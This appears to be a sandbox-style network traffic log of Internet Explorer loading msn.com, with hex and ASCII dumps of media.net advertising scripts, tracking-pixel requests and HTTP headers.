                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC956INData Raw: 65 6c 69 6e 65 28 74 2c 6d 65 74 61 50 61 72 61 6d 55 74 69 6c 2e 6c 67 50 70 5b 74 5d 29 7d 28 29 2c 53 2e 61 64 64 50 61 69 72 54 6f 50 69 70 65 6c 69 6e 65 28 63 6f 6d 6d 6f 6e 43 6f 6e 73 74 61 6e 74 73 2e 4c 4f 47 5f 50 49 50 45 4c 49 4e 45 2e 4f 50 54 5f 4f 55 54 2c 55 69 28 29 3f 31 3a 30 29 2c 52 26 26 28 74 28 5b 22 64 6d 61 22 2c 63 6f 6d 6d 6f 6e 43 6f 6e 73 74 61 6e 74 73 2e 4c 4f 47 5f 50 49 50 45 4c 49 4e 45 2e 4d 41 43 52 4f 5f 56 49 53 49 54 4f 52 5f 49 44 2c 63 6f 6d 6d 6f 6e 43 6f 6e 73 74 61 6e 74 73 2e 4c 4f 47 5f 50 49 50 45 4c 49 4e 45 2e 4c 32 5f 54 59 50 45 2c 22 6c 32 63 68 22 2c 22 72 65 73 64 6e 22 5d 2c 21 31 29 2c 74 28 5b 22 63 64 6e 68 22 2c 22 6c 31 65 73 69 64 22 5d 2c 21 30 29 29 2c 65 3d 63 6f 6d 6d 6f 6e 43 6f 6e 73 74
                                                                                                                                                                                                                  Data Ascii: eline(t,metaParamUtil.lgPp[t])}(),S.addPairToPipeline(commonConstants.LOG_PIPELINE.OPT_OUT,Ui()?1:0),R&&(t(["dma",commonConstants.LOG_PIPELINE.MACRO_VISITOR_ID,commonConstants.LOG_PIPELINE.L2_TYPE,"l2ch","resdn"],!1),t(["cdnh","l1esid"],!0)),e=commonConst
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC964INData Raw: 6d 55 74 69 6c 2e 6d 69 73 63 2e 66 72 42 64 72 49 64 2b 74 7d 72 65 74 75 72 6e 20 55 74 28 29 7d 28 29 2b 22 26 22 2b 6a 74 2b 22 26 72 63 3d 22 2b 72 3b 72 3d 50 28 29 3b 75 74 69 6c 2e 69 73 53 65 74 28 72 29 26 26 28 61 2b 3d 22 26 6b 73 75 3d 22 2b 72 29 3b 72 3d 22 22 3b 69 66 28 75 74 69 6c 2e 69 73 53 74 72 69 6e 67 53 65 74 28 72 3d 50 65 28 22 61 69 64 22 29 29 3f 61 2b 3d 22 26 76 67 64 5f 6f 70 70 5f 69 64 3d 22 2b 72 3a 75 74 69 6c 2e 69 73 53 74 72 69 6e 67 53 65 74 28 72 3d 44 2e 61 63 69 64 29 26 26 28 61 2b 3d 22 26 61 63 69 64 3d 22 2b 72 29 2c 75 74 69 6c 2e 69 73 53 74 72 69 6e 67 53 65 74 28 48 65 28 29 29 26 26 75 74 69 6c 2e 61 64 64 56 67 44 61 74 61 28 22 6c 33 5f 73 63 22 2c 48 65 28 29 29 2c 22 22 21 3d 78 65 28 29 26 26 28 61
                                                                                                                                                                                                                  Data Ascii: mUtil.misc.frBdrId+t}return Ut()}()+"&"+jt+"&rc="+r;r=P();util.isSet(r)&&(a+="&ksu="+r);r="";if(util.isStringSet(r=Pe("aid"))?a+="&vgd_opp_id="+r:util.isStringSet(r=D.acid)&&(a+="&acid="+r),util.isStringSet(He())&&util.addVgData("l3_sc",He()),""!=xe()&&(a
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC980INData Raw: 2c 22 74 6f 70 3d 30 22 2c 22 73 63 72 6f 6c 6c 62 61 72 73 3d 79 65 73 22 2c 22 74 6f 6f 6c 62 61 72 3d 79 65 73 22 2c 22 6c 6f 63 61 74 69 6f 6e 3d 79 65 73 22 2c 22 70 65 72 73 6f 6e 61 6c 62 61 72 3d 79 65 73 22 2c 22 73 74 61 74 75 73 3d 79 65 73 22 2c 22 72 65 73 69 7a 61 62 6c 65 3d 79 65 73 22 2c 22 74 69 74 6c 65 62 61 72 3d 79 65 73 22 5d 2c 69 3d 22 41 64 43 6c 69 63 6b 22 2b 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2c 72 3d 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 68 72 65 66 2c 69 2c 65 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 72 29 7b 74 72 79 7b 72 2e 6d 6f 76 65 54 6f 26 26 72 2e 6d 6f 76 65 54 6f 28 30 2c 30 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 21 28 74 3d 74 7c 7c 77 69 6e 64
                                                                                                                                                                                                                  Data Ascii: ,"top=0","scrollbars=yes","toolbar=yes","location=yes","personalbar=yes","status=yes","resizable=yes","titlebar=yes"],i="AdClick"+(new Date).getTime(),r=window.open(this.href,i,e.join(","));if(null!==r){try{r.moveTo&&r.moveTo(0,0)}catch(t){}if(!(t=t||wind
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC988INData Raw: 31 2c 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 2c 22 2a 22 29 3b 65 6c 73 65 20 69 66 28 75 74 69 6c 2e 69 73 4c 33 50 61 72 65 6e 74 4e 6f 74 41 63 63 65 73 73 69 62 6c 65 28 29 29 61 2e 70 61 72 61 6d 73 2e 6c 33 53 72 63 3d 31 2c 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 2c 22 2a 22 29 3b 65 6c 73 65 20 74 72 79 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 5f 6d 4e 44 65 74 61 69 6c 73 2e 74 72 69 67 67 65 72 41 64 54 61 67 45 76 65 6e 74 28 65 2c 74 2c 69 2c 72 29 7d 63 61 74 63 68 28 74 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 74 2c 65 29 7b 74 72 79
                                                                                                                                                                                                                  Data Ascii: 1,window.parent.parent.postMessage(JSON.stringify(a),"*");else if(util.isL3ParentNotAccessible())a.params.l3Src=1,window.parent.postMessage(JSON.stringify(a),"*");else try{window.parent._mNDetails.triggerAdTagEvent(e,t,i,r)}catch(t){}}function ze(t,e){try


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  15192.168.2.64980723.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1002OUTGET /bqi.php?lf=5&&vgd_l2type=setting&pid=8PO641UYD&cme=S4_cq7T57eCIr457wnOZONsOijxuA5EygvvxEjyXm71KTilyaTdTHRWOugo0C_JUn4twsFFYarKn93u4d6Wh6HMuQsMK5wWTGu1mrmPGv06hdWu24i6BYU93PtG7z1VQdB4ux8XjUQgg7DwLdqAoOijT7cYB0PZ7NTCBf9W5LFQjtZSGcztLSxTeV8g-zadF_C34PocyUZBlJYj8v-g9knLNYbSXoCou||NDHRnZ9Gz3KXlI-i9OnZqQ==|5gDUJdTGiJzedmq9hanWYg==|sRBSg3CPSiQ=|YdjFvixrVaHKWoanJxQ7pN1u-FbdnHzrNjhpugAcObH3UBK3ulwAWiVtoHi1pupYycuLTp-eXshvuac-oX9kgg==|N7fu2vKt8_s=|f5bf1u7fLjnm37la4OqE47RtCc7tk3v3IH31-me1miPZAj1YnQwQh2PphemVXLK4fAUBKHTKZdPfBF6Z3YxbAN_GIqcUs8MdLqegLZSBCy3hsW5q2MOql5UxuUCHNLvR17Gr4GMn9bf5Jf-OYIJvVpxHv8PIWqmXdxa1VL06H2CKusOFWLZA_QmNop8hTtZlFs_wuMW5dZSm1HenepcN0cikahOsfwZT|&gdpr=0&prid=8PRVV7640&cid=8CU157172&crid=722878611&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&vi=1638488555296348136&ugd=4&cc=CH&sc=ZH&bdrid=4&startTime=1638520985695&l2type=setting&vgd_l1rakh=1638488555141945565&l1ch=1&sttm=1638520986209&upk=1638520983.26641&hvsid=00001638520986209014104136331365&verid=9999999&vgd_sc=ZH&infr=1&twna=1&vgd_hbReqId=T1638485630C8S34U173&l1hcsd=l1!N4|8028&vgd_l1rhst=contextual.media.net&vgd_gdprcs=1&vgd_uspa=0&vgd_isiolc=0&clp=%7B%7D&cl=%7B%7D&rtbsd=10&bidData=sd2%3Dnull~bb%3D186~vv%3D0~erpm%3D0.04~ogerpm%3D0.04~MFB%3D10K~smm_bid%3D0.02~bm%3D0.9~smm_sd%3D2021120121~sid%3D722878611~sd%3D2~uid%3D2IaaKnuVnvziDdNYpZ~dc2%3D1~btd%3D14241703849787268410763125577306022343800731350682634986482226645438464~scd%3Dzh~uim%3D466966~url_tkc%3D0~ss%3D1280x1024~uiw%3D100~ce%3D1~xgb_sd%3D2021101600~last%3D0~CI%3D2624~ip%3D1xrX0Z~fbb%3D0~riipua%3D0%2C0~xgb_nt%3D101~nts%3D1~tb%3D-1~et%3D28~ct%3Dzurich~rc%3D8%2C1~basis2%3D196~url_b%3D0.04~basis1%3D196~isRef%3D0~lc%3D0~url_tvi%3D0~smm_wr%3D2.0898~url_l%3D50~xgboost_b%3D0.92~bid%3D0.02~xgb_b%3D0.92~dc%3D8~gcat%3D500884~ogbid%3D0.02%7C%7Ccbdp%3D0.02%7C%7Cbflag%3D0%7C%7Csobp%3D0%7C%7Cddiv%3D%25%25DFP_DIV%25%25%7C%7Cdmm%3D%25%25DMS_STRATEGY%25%25%7C%7Cdtc%3Dnydc%7C%7Cabte%3DCONTROL%7C%7Chsw%3D%25%25HAS_SECOND_WINNER%25%25~ibc%3D1~ddt%3D-1~nsz%3D1~tgs%3D300x250~bsb%3D0~bsp%3D0~tmx%3D200&matchString=hr%3D0&l2ch=1&l2wsip=2887305233&sethcsd=set!A18%7C8013&vgd_pgid=p11306311666t202112030843&vgd_pgids=1 HTTP/1.1
                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: lg3.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1005INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 15
                                                                                                                                                                                                                  Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                  ntCoent-Length: 15
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=21600
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:43:08 GMT
                                                                                                                                                                                                                  Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:43:08 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1005INData Raw: 76 61 72 20 6c 6f 67 67 65 64 20 3d 20 31 3b
                                                                                                                                                                                                                  Data Ascii: var logged = 1;


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  16192.168.2.64982123.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1005OUTGET /48/nrrV52461.js HTTP/1.1
                                                                                                                                                                                                                  Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: hbcm_sd=4%7C1638520979780
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1006INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 91348
                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                  Pragma: max-age=2592000
                                                                                                                                                                                                                  ETag: "f3dcc1592ff35c4ac7631edb38265c3f"
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  X-MNET-H: 8-12
                                                                                                                                                                                                                  Cache-Control: max-age=1209600
                                                                                                                                                                                                                  Expires: Thu, 16 Dec 2021 23:43:08 GMT
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:43:08 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1006INData Raw: 76 61 72 20 5f 6d 4e 52 65 71 75 69 72 65 2c 5f 6d 4e 44 65 66 69 6e 65 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 63 3d 7b 7d 2c 75 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 7d 5f 6d 4e 52 65 71 75 69 72 65 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 72 29 7b 76 61 72 20 6e 2c 69 2c 6f 3d 5b 5d 3b 66 6f 72 28 69 20 69 6e 20 74 29 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 69 29 26 26 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 28 6e 3d 74 5b 69 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 28 76 6f 69 64 20 30 21 3d 3d 63 5b 6e 5d 7c 7c 28 63 5b 6e 5d 3d 65 28 75 5b 6e 5d 2e 64 65 70 73 2c 75 5b 6e 5d 2e 63
                                                                                                                                                                                                                  Data Ascii: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].c
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1009INData Raw: 3a 74 5b 6e 5d 29 29 29 3b 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 74 2c 65 29 7b 73 28 74 29 26 26 28 65 3d 75 28 65 29 3f 65 3a 22 22 2c 72 5b 74 5d 3d 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 74 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 22 22 21 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 74 29 7b 63 61
                                                                                                                                                                                                                  Data Ascii: :t[n])));return o}function n(t,e){s(t)&&(e=u(e)?e:"",r[t]=e)}function i(t){return"[object Array]"===Object.prototype.toString.call(t)}function c(t){return"function"==typeof t}function s(t){return"string"==typeof t&&""!==t}function u(t){switch(typeof t){ca
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1025INData Raw: 26 26 6f 2e 69 73 53 65 74 28 65 2e 68 6f 73 74 6e 61 6d 65 29 3f 65 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 65 2e 68 6f 73 74 6e 61 6d 65 3a 6f 2e 69 73 53 65 74 28 65 2e 68 72 65 66 29 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 69 66 28 2d 31 3c 65 2e 69 6e 64 65 78 4f 66 28 22 2f 2f 22 29 29 72 65 74 75 72 6e 20 65 3d 28 74 3d 65 2e 73 70 6c 69 74 28 22 2f 22 29 29 5b 30 5d 2b 22 2f 2f 22 2b 74 5b 32 5d 7d 28 65 2e 68 72 65 66 29 3a 76 6f 69 64 20 30 7d 2c 73 65 74 54 61 72 67 65 74 4f 66 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 72 67 65 74 22 2c 74 29 7d 2c 67 65 74 54 61 72 67 65 74 4f 66 45 6c 65 6d 65 6e 74 46 6f 72 4c 6f 67 67 69 6e 67 3a 66 75 6e 63
                                                                                                                                                                                                                  Data Ascii: &&o.isSet(e.hostname)?e.protocol+"//"+e.hostname:o.isSet(e.href)?function(e){var t;if(-1<e.indexOf("//"))return e=(t=e.split("/"))[0]+"//"+t[2]}(e.href):void 0},setTargetOfElement:function(e,t){e.setAttribute("target",t)},getTargetOfElementForLogging:func
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1033INData Raw: 75 6e 63 74 69 6f 6e 20 67 28 74 2c 65 2c 69 29 7b 69 66 28 21 74 2e 69 70 61 74 68 29 72 65 74 75 72 6e 2d 31 3d 3d 65 2e 73 72 63 2e 69 6e 64 65 78 4f 66 28 22 34 30 34 5f 31 58 31 22 29 26 26 28 69 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 76 69 73 69 62 6c 65 22 29 2c 7a 65 28 22 6e 6c 22 2c 74 29 2c 63 28 65 29 2c 30 3b 76 61 72 20 72 2c 61 2c 6e 2c 6f 3d 6e 65 77 20 49 6d 61 67 65 2c 64 3d 28 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 7b 77 69 64 74 68 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 77 69 64 74 68 22 29 7c 7c 65 2e 77 69 64 74 68 7c 7c 70 61 72 73 65 49 6e 74 28 74 2e 6d 61 74 63 68 28 2f 77 69 64 74 68 3d 28 5b 22 27 30 2d 39 5d 2b 29 2f 29 5b 31 5d 2e 72 65 70 6c 61 63 65 28 2f
                                                                                                                                                                                                                  Data Ascii: unction g(t,e,i){if(!t.ipath)return-1==e.src.indexOf("404_1X1")&&(i.style.visibility="visible"),ze("nl",t),c(e),0;var r,a,n,o=new Image,d=(d=function(e,t){try{return{width:e.getAttribute("width")||e.width||parseInt(t.match(/width=(["'0-9]+)/)[1].replace(/
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1049INData Raw: 65 6c 69 6e 65 28 74 2c 6d 65 74 61 50 61 72 61 6d 55 74 69 6c 2e 6c 67 50 70 5b 74 5d 29 7d 28 29 2c 53 2e 61 64 64 50 61 69 72 54 6f 50 69 70 65 6c 69 6e 65 28 63 6f 6d 6d 6f 6e 43 6f 6e 73 74 61 6e 74 73 2e 4c 4f 47 5f 50 49 50 45 4c 49 4e 45 2e 4f 50 54 5f 4f 55 54 2c 55 69 28 29 3f 31 3a 30 29 2c 52 26 26 28 74 28 5b 22 64 6d 61 22 2c 63 6f 6d 6d 6f 6e 43 6f 6e 73 74 61 6e 74 73 2e 4c 4f 47 5f 50 49 50 45 4c 49 4e 45 2e 4d 41 43 52 4f 5f 56 49 53 49 54 4f 52 5f 49 44 2c 63 6f 6d 6d 6f 6e 43 6f 6e 73 74 61 6e 74 73 2e 4c 4f 47 5f 50 49 50 45 4c 49 4e 45 2e 4c 32 5f 54 59 50 45 2c 22 6c 32 63 68 22 2c 22 72 65 73 64 6e 22 5d 2c 21 31 29 2c 74 28 5b 22 63 64 6e 68 22 2c 22 6c 31 65 73 69 64 22 5d 2c 21 30 29 29 2c 65 3d 63 6f 6d 6d 6f 6e 43 6f 6e 73 74
                                                                                                                                                                                                                  Data Ascii: eline(t,metaParamUtil.lgPp[t])}(),S.addPairToPipeline(commonConstants.LOG_PIPELINE.OPT_OUT,Ui()?1:0),R&&(t(["dma",commonConstants.LOG_PIPELINE.MACRO_VISITOR_ID,commonConstants.LOG_PIPELINE.L2_TYPE,"l2ch","resdn"],!1),t(["cdnh","l1esid"],!0)),e=commonConst
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1057INData Raw: 6d 55 74 69 6c 2e 6d 69 73 63 2e 66 72 42 64 72 49 64 2b 74 7d 72 65 74 75 72 6e 20 55 74 28 29 7d 28 29 2b 22 26 22 2b 6a 74 2b 22 26 72 63 3d 22 2b 72 3b 72 3d 50 28 29 3b 75 74 69 6c 2e 69 73 53 65 74 28 72 29 26 26 28 61 2b 3d 22 26 6b 73 75 3d 22 2b 72 29 3b 72 3d 22 22 3b 69 66 28 75 74 69 6c 2e 69 73 53 74 72 69 6e 67 53 65 74 28 72 3d 50 65 28 22 61 69 64 22 29 29 3f 61 2b 3d 22 26 76 67 64 5f 6f 70 70 5f 69 64 3d 22 2b 72 3a 75 74 69 6c 2e 69 73 53 74 72 69 6e 67 53 65 74 28 72 3d 44 2e 61 63 69 64 29 26 26 28 61 2b 3d 22 26 61 63 69 64 3d 22 2b 72 29 2c 75 74 69 6c 2e 69 73 53 74 72 69 6e 67 53 65 74 28 48 65 28 29 29 26 26 75 74 69 6c 2e 61 64 64 56 67 44 61 74 61 28 22 6c 33 5f 73 63 22 2c 48 65 28 29 29 2c 22 22 21 3d 78 65 28 29 26 26 28 61
                                                                                                                                                                                                                  Data Ascii: mUtil.misc.frBdrId+t}return Ut()}()+"&"+jt+"&rc="+r;r=P();util.isSet(r)&&(a+="&ksu="+r);r="";if(util.isStringSet(r=Pe("aid"))?a+="&vgd_opp_id="+r:util.isStringSet(r=D.acid)&&(a+="&acid="+r),util.isStringSet(He())&&util.addVgData("l3_sc",He()),""!=xe()&&(a
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1073INData Raw: 2c 22 74 6f 70 3d 30 22 2c 22 73 63 72 6f 6c 6c 62 61 72 73 3d 79 65 73 22 2c 22 74 6f 6f 6c 62 61 72 3d 79 65 73 22 2c 22 6c 6f 63 61 74 69 6f 6e 3d 79 65 73 22 2c 22 70 65 72 73 6f 6e 61 6c 62 61 72 3d 79 65 73 22 2c 22 73 74 61 74 75 73 3d 79 65 73 22 2c 22 72 65 73 69 7a 61 62 6c 65 3d 79 65 73 22 2c 22 74 69 74 6c 65 62 61 72 3d 79 65 73 22 5d 2c 69 3d 22 41 64 43 6c 69 63 6b 22 2b 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2c 72 3d 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 68 72 65 66 2c 69 2c 65 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 72 29 7b 74 72 79 7b 72 2e 6d 6f 76 65 54 6f 26 26 72 2e 6d 6f 76 65 54 6f 28 30 2c 30 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 21 28 74 3d 74 7c 7c 77 69 6e 64
                                                                                                                                                                                                                  Data Ascii: ,"top=0","scrollbars=yes","toolbar=yes","location=yes","personalbar=yes","status=yes","resizable=yes","titlebar=yes"],i="AdClick"+(new Date).getTime(),r=window.open(this.href,i,e.join(","));if(null!==r){try{r.moveTo&&r.moveTo(0,0)}catch(t){}if(!(t=t||wind
                                                                                                                                                                                                                  2021-12-02 23:43:08 UTC1081INData Raw: 31 2c 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 2c 22 2a 22 29 3b 65 6c 73 65 20 69 66 28 75 74 69 6c 2e 69 73 4c 33 50 61 72 65 6e 74 4e 6f 74 41 63 63 65 73 73 69 62 6c 65 28 29 29 61 2e 70 61 72 61 6d 73 2e 6c 33 53 72 63 3d 31 2c 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 2c 22 2a 22 29 3b 65 6c 73 65 20 74 72 79 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 5f 6d 4e 44 65 74 61 69 6c 73 2e 74 72 69 67 67 65 72 41 64 54 61 67 45 76 65 6e 74 28 65 2c 74 2c 69 2c 72 29 7d 63 61 74 63 68 28 74 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 74 2c 65 29 7b 74 72 79
                                                                                                                                                                                                                  Data Ascii: 1,window.parent.parent.postMessage(JSON.stringify(a),"*");else if(util.isL3ParentNotAccessible())a.params.l3Src=1,window.parent.postMessage(JSON.stringify(a),"*");else try{window.parent._mNDetails.triggerAdTagEvent(e,t,i,r)}catch(t){}}function ze(t,e){try


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  2192.168.2.64979223.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:50 UTC806OUTGET /bping.php?&gdpr=0&prid=8PRVV7640&cid=8CU157172&crid=858412214&vi=1638488555656014322&ugd=4&lf=6&cc=CH&sc=ZH&lper=50&wsip=2886781044&r=1638520979551&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&vgd_l2type=setting&vgd_sbSup=0&vgd_is_amp=0&vgd_asn=60068&vgd_rakh=1638488555181756319&vgd_l1rhst=contextual.media.net&vgd_rpth=%2Fmedianet.php&vgd_pgid=p11306311666t202112030842&vgd_pgids=1&vgd_gdprcs=1&vgd_uspa=0&hvsid=00001638520979548014104136331645&gdpr=0&vgd_end=1 HTTP/1.1
                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: lg3.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2021-12-02 23:42:50 UTC807INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 35
                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=21600
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:42:50 GMT
                                                                                                                                                                                                                  Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:50 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:50 UTC807INData Raw: 47 49 46 38 37 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                  Data Ascii: GIF87a,L;


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  3192.168.2.64979323.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:51 UTC807OUTGET /checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=6&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp HTTP/1.1
                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: hbcm_sd=1%7C1638520979780
